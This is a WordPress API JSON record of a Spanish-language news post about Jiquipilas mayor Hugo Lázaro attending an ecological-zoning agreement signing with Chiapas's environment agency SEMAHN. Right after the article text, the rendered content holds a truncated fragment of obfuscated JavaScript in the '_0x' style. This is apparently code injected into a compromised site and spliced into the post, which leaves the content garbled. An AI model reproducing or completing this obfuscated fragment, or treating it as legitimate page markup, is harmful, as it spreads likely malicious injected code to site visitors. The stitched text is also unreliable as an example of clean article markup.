{"id":1644,"date":"2022-04-27T01:29:06","date_gmt":"2022-04-27T01:29:06","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=1644"},"modified":"2022-04-27T01:29:07","modified_gmt":"2022-04-27T01:29:07","slug":"hugo-lazaro-acude-a-firma-de-convenio-con-la-semahn","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=1644","title":{"rendered":"Hugo L\u00e1zaro acude a firma de convenio con la SEMAHN"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"1645\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220426-WA0027-1024x768.jpg\" alt=\"\" class=\"wp-image-1645\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220426-WA0027-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220426-WA0027-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220426-WA0027-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220426-WA0027-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220426-WA0027.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"1646\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220426-WA0026-1024x768.jpg\" alt=\"\" class=\"wp-image-1646\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220426-WA0026-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220426-WA0026-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220426-WA0026-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220426-WA0026-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220426-WA0026.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Unificar esfuerzos con instituciones estatales para redoblar trabajos en materia de medio ambiente.<\/p>\n\n\n\n<p>\u2022 El edil Jiquipilteco refrend\u00f3 el compromiso del gobierno municipal con el medio ambiente. <\/p>\n\n\n\n<p>26 de Abril del.2022. Jiquipilas, Chiapas.- El alcalde Hugo L\u00e1zaro Rodr\u00edguez, Presidente de Jiquipilas acudi\u00f3 a la firma de convenio con la SEMAHN, en la que se acord\u00f3 la Colaboraci\u00f3n para la instrumentaci\u00f3n del Programa de Ordenamiento Ecol\u00f3gico del Territorio de los Paisajes Sostenibles de la Regi\u00f3n Sierra Madre y Costa de Chiapas.Esta acci\u00f3n ayudar\u00e1 a mantener el r\u00e9gimen del suelo y que se cuente con los lineamientos, respetando los l\u00edmites y reservas naturales; as\u00ed como mantener la estabilidad ambiental alejada de la invasi\u00f3n del hombre, para prosperidad y beneficios ecol\u00f3gicos.Hugo L\u00e1zaro recalc\u00f3 que al sumar esfuerzos con regiones y municipios, las estrategias de trabajo se fortalecen para lograr las mejoras deseadas, ya que la caracter\u00edstica principal de Chiapas es la naturaleza y por ello se debe cumplir con las normas de ordenamiento ecol\u00f3gico.En dicho evento estuvieron presentes tambi\u00e9n los  Presidentes Municipales de Arriaga, Cintalapa, Mapastepec y Tonal\u00e1; al acto asistieron los Directores de las Reservas de la Biosfera de El Ocote, El Triunfo, La Encrucijada y La Sepultura y de la Comisi\u00f3n Nacional de \u00c1reas Naturales Protegidas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Unificar esfuerzos con instituciones estatales para redoblar trabajos en materia de medio ambiente. \u2022 El edil Jiquipilteco refrend\u00f3 el compromiso del gobierno municipal con el medio ambiente. 26 de Abril del.2022. Jiquipilas, Chiapas.- El alcalde Hugo L\u00e1zaro Rodr\u00edguez, Presidente de Jiquipilas acudi\u00f3 a la firma de convenio con la SEMAHN, en la que se acord\u00f3 &hellip;<\/p>\n","protected":false},"author":2,"featured_media":1646,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-1644","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1644","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1644"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1644\/revisions"}],"predecessor-version":[{"id":1647,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1644\/revisions\/1647"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/1646"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1644"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1644"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1644"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}